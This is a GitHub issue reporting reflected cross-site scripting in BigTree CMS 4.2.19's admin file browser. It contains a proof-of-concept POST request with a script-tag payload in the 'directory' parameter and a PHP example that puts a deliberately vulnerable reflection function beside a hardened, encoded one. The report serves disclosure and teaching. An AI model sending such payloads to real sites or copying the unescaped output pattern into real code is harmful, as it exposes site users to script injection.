
Cross-site Scripting in bigtreecms 4.2.19 #327

Closed
phantom0301 opened this issue Jan 22, 2018 · 1 comment

phantom0301 commented Jan 22, 2018

FILE:
core/admin/ajax/developer/extensions/file-browser.php

Vulnerable code:
$parts = explode("/",$_POST["directory"]); ->
$postdirectory[] = $part; ->
$directory = SERVER_ROOT.$postdirectory; ->

PoC:
POST /core/admin/ajax/developer/extensions/file-browser.php
xxx: xxx
xxx: xxx
xxx: xxx

cloud_disabled=1&location=server&directory=<script>alert(123)</script>
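The report shows the "directory" POST parameter being split and joined back into a path, and the alert() payload shows that the value is reflected into the HTML response without encoding. The following PHP is an added illustration written for this page, not BigTree's own file-browser.php (whose output statement is not shown here). It places the unsafe reflection pattern beside a hardened version that validates each path segment and HTML-encodes the value on output. The function names, the `$sample_post` value and the breadcrumb markup are constructed for the example; `SERVER_ROOT` is referenced only in comments because the page does not show how it is defined.

```php
<?php
// Added example for this issue page; not BigTree CMS code.
// Assumption: the "directory" value ends up inside an HTML response,
// which is what the report's alert() payload demonstrates.

// Constructed sample input mirroring the parameter value from the report.
$sample_post = ['directory' => '<script>alert(123)</script>'];

// Unsafe pattern: the request value is split, re-joined and written into
// markup unchanged, so any markup in the parameter reaches the page as-is.
function render_breadcrumb_vulnerable(array $post): string
{
    $parts = explode('/', $post['directory'] ?? '');
    $postdirectory = implode('/', $parts);
    return '<span class="path">' . $postdirectory . '</span>';
}

// Hardened pattern, two layers:
// 1. Validate: accept only path segments made of safe characters and
//    refuse "." and "..", since the report shows the value also being
//    appended to SERVER_ROOT and used as a filesystem path.
// 2. Encode: HTML-escape whatever is echoed, independent of validation.
function safe_directory_segments(string $directory): ?array
{
    $segments = [];
    foreach (explode('/', $directory) as $part) {
        if ($part === '') {
            continue; // tolerate leading, trailing or doubled slashes
        }
        if ($part === '.' || $part === '..' || !preg_match('/\A[A-Za-z0-9_.-]+\z/', $part)) {
            return null; // reject the whole request value, fail closed
        }
        $segments[] = $part;
    }
    return $segments;
}

function render_breadcrumb_hardened(array $post): string
{
    $segments = safe_directory_segments($post['directory'] ?? '');
    if ($segments === null) {
        // Do not reflect the rejected value at all, not even escaped.
        return '<span class="path error">invalid directory</span>';
    }
    $encoded = htmlspecialchars(implode('/', $segments), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<span class="path">' . $encoded . '</span>';
}

// Vulnerable output echoes the script tag verbatim; the hardened output
// rejects it, and a legitimate path is still rendered (HTML-encoded).
echo render_breadcrumb_vulnerable($sample_post), PHP_EOL;
echo render_breadcrumb_hardened($sample_post), PHP_EOL;
echo render_breadcrumb_hardened(['directory' => 'extensions/my-ext/css']), PHP_EOL;
```

Output encoding with htmlspecialchars() is what closes the XSS; the segment validation is the extra check a reviewer would want because the same value is concatenated onto SERVER_ROOT in the snippet above, and an admin-only endpoint is still reachable by any logged-in administrator who can be lured into submitting the form.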

timbuckingham added a commit that referenced this issue Feb 14, 2018

Thanks for the report, should be fixed in 4.2-devel!
